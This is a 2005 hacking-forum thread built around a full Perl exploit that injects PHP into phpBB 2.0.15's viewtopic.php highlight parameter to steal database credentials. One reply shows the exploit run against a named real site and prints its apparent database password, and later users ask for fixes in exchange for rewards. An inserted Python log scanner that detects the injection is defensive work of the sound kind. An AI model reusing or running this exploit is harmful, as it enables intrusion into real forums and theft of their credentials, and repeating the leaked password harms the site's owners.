Forums: PhpBB 2.0.15 Database Authentication Details Exploit

Discussion in 'CMS/forum vulnerabilities' started by VARVAR, 31 Aug 2005.

  1. VARVAR

    VARVAR New Member

    Joined:
    3 Jun 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Code:
    #!/usr/bin/perl
    
    # **************************************************************
    #**
    #** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability 
    #** This exploit gives the user all the details about the database 
    #** connection such as database host, username, password and 
    #** database name.
    #**
    #** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 
    #** 
    #** Greetings to GvR, Jumento, PP, CKrew & friends
    #**
    # **************************************************************
    
    use IO::Socket;
    
    print "+-----------------------------------------------------------------------+\r\n";
    print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
    print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
    print "+-----------------------------------------------------------------------+\r\n";
    
    if (@ARGV < 3)
    {
    print "Usage:\r\n";
    print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
    print "SERVER - Server where PhpBB is installed.\r\n";
    print "DIR - PHPBB directory or / for no directory.\r\n";
    print "THREADID - Id of an existing thread.\r\n";
    print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
    print " Use this when a thread needs authentication for viewing\r\n";
    print " You can use Firefox in combination with \"Live HTTP\r\n";
    print " Headers\" to get this cookiestring.\r\n\r\n";
    print "Example 1 (with cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
    phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
    autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
    userid%22%3Bs%3A1%3A%222%22%3B%7D; 
    phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
    print "Example 2 (without cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
    exit();
    }
    $serv = $ARGV[0];
    $dir = $ARGV[1];
    $threadid = $ARGV[2];
    $cookie = $ARGV[3];
    
    $serv =~ s/http:\/\///ge;
    $delimit = "superloneEST";
    
    $sploit = $dir . "viewtopic.php?t=";
    $sploit .= $threadid;
    $sploit .= "&highlight='.printf($delimit.";
    $sploit .= "\$dbhost.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbname.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbuser.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbpasswd.";
    $sploit .= "$delimit).'";
    
    print $sploit,"\n";
    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
    or die "[+] Connecting ... Could not connect to host.\n\n";
    
    print "[+] Connecting OK\n";
    sleep(1);
    
    print "[+] Sending exploit ";
    print $sock "GET $sploit HTTP/1.1\r\n";
    print $sock "Host: $serv\r\n";
    if ( defined $cookie) {
    print $sock "Cookie: $cookie \r\n";
    }
    print $sock "Connection: close\r\n\r\n";
    
    
    $succes = 0;
    
    while ($answer = <$sock>) {
    $delimitIndex = index $answer, $delimit;
    if ($delimitIndex >= 0) {
    $succes = 1;
    $urlIndex = index $answer, "href";
    if ($urlIndex < 0){
    $answer = substr($answer, length($delimit));
    $length = 0;
    while (length($answer) > 0) {
    $nex = index($answer, $delimit);
    if ($nex > 0) {
    push(@array, substr($answer, 0, $nex));
    $answer = substr($answer, $nex + length($delimit), length($answer));
    } else {
    $answer= "";
    }
    }
    }
    }
    }
    
    close($sock);
    
    if ($succes == 1) {
    print "OK\n";
    sleep(1);
    print "[+] Database Host: " . $array[0] . "\n";
    sleep(1);
    print "[+] Database Name: " . $array[1] . "\n";
    sleep(1);
    print "[+] Username: " . $array[2] . "\n";
    sleep(1);
    print "[+] Password: " . $array[3] . "\n";
    sleep(1);
    } else {
    print "FAILED\n";
    }
     
    #1 VARVAR, 31 Aug 2005
    Last edited by a moderator: 2 Dec 2005
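    An added defender-side example, not part of VARVAR's post or of the SecureD script: it scans web-server access-log lines for the viewtopic.php "highlight" injection pattern the script above sends (a quote closing the string context followed by a concatenation dot or a function call). The log format is assumed to be Apache combined/common, and the sample log lines are constructed.

```python
import re
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import urlsplit, parse_qs, unquote

# Apache common/combined log format: client IP, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic for PHP code injected into the highlight parameter: a quote followed by
# a concatenation dot, a function call, or a PHP variable. A legitimate search term
# such as foo(bar) would also match, so treat hits as leads to review, not verdicts.
INJECT_RE = re.compile(r"""['"]\s*\.|\w+\s*\(|\$\w+""")

# Constructed sample log; only the second and third requests carry the injection pattern.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/Aug/2005:12:00:01 +0400] "GET /forum/viewtopic.php?t=1266&highlight=perl HTTP/1.1" 200 5120',
    '10.0.0.9 - - [31/Aug/2005:12:00:07 +0400] "GET /forum/viewtopic.php?t=1266&highlight=%27.printf($dbhost.$dbuser).%27 HTTP/1.1" 200 5130',
    '10.0.0.7 - - [31/Aug/2005:12:00:09 +0400] "GET /forum/viewtopic.php?t=1266&highlight=%2527.printf($dbpasswd).%2527 HTTP/1.1" 200 5140',
    '10.0.0.8 - - [31/Aug/2005:12:00:11 +0400] "GET /forum/index.php HTTP/1.1" 200 900',
]


def decode_highlight(target: str) -> Optional[str]:
    """Return the fully URL-decoded highlight parameter of a viewtopic.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("viewtopic.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("highlight")
    if not values:
        return None
    value = values[0]
    # Decode repeatedly: a double-encoded payload (%2527) only reveals the quote
    # after a second pass, and a single-pass check would miss it.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(lines: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (client_ip, decoded_highlight) for requests that look like highlight injection."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        highlight = decode_highlight(m.group("target"))
        if highlight is not None and INJECT_RE.search(highlight):
            yield m.group("ip"), highlight
```

    On the constructed sample this reports the requests from 10.0.0.9 and 10.0.0.7 and ignores the plain search and the index.php hit.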
  2. Tier

    Tier New Member

    Joined:
    23 Nov 2004
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    So that's how it is, there are gaps in the right places :))
     
  3. Dj Skeleton™

    Joined:
    1 Jun 2002
    Messages:
    225
    Likes Received:
    11
    Reputations:
    1
    Guys, explain how to make this work.

     
  4. VARVAR

    VARVAR New Member

    Joined:
    3 Jun 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Works only on phpBB 2.0.15.


    H:\temp>phpbb.pl boastology.com /forum/ 1266
    +-----------------------------------------------------------------------+
    | PhpBB 2.0.15 Database Authentication Details Exploit |
    | By SecureD gvr.secured<AT>gmail<DOT>com |
    +-----------------------------------------------------------------------+
    [+] Connecting OK
    [+] Sending exploit OK
    [+] Database Host: localhost
    [+] Database Name: boast_phpbb1
    [+] Username: boast_phpbb1
    [+] Password: cLuTa5OpQx
     
  5. Tier

    Tier New Member

    Joined:
    23 Nov 2004
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    So where's the catch? :)
    I still get gaps.
     
  6. Manoz

    Manoz Elder

    Joined:
    15 Feb 2005
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    What do I do with this:
    <code>
    | PhpBB 2.0.15 Database Authentication Details Exploit |
    | By SecureD gvr.secured<AT>gmail<DOT>com |
    +-----------------------------------------------------------------------+
    [+] Connecting OK
    [+] Sending exploit OK
    [+] Database Host:
    [+] Database Name:
    [+] Username:
    [+] Password:
    </code>

    Lamer protection again?
     
  7. Grrl

    Grrl Elder

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
  8. Miller

    Miller New Member

    Joined:
    13 Sep 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    screen:




    Question: why doesn't it connect???
     
  9. KP0T

    KP0T New Member

    Joined:
    13 Mar 2005
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    Same here, I'm wondering too... Why?!
     
  10. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Well, it has probably been closed off... and Grrl is right, you'd be better off using that exploit from the start..
     
  11. LeopardSS

    LeopardSS Elder

    Joined:
    8 Jan 2006
    Messages:
    64
    Likes Received:
    8
    Reputations:
    5
    Damn, what needs to be fixed there so that there are no empty lines? Plz at least send it to me by PM. I'll give you a plus.
     
  12. LeopardSS

    LeopardSS Elder

    Joined:
    8 Jan 2006
    Messages:
    64
    Likes Received:
    8
    Reputations:
    5
    Whoever helps gets a seven-digit ICQ number and pluses from me.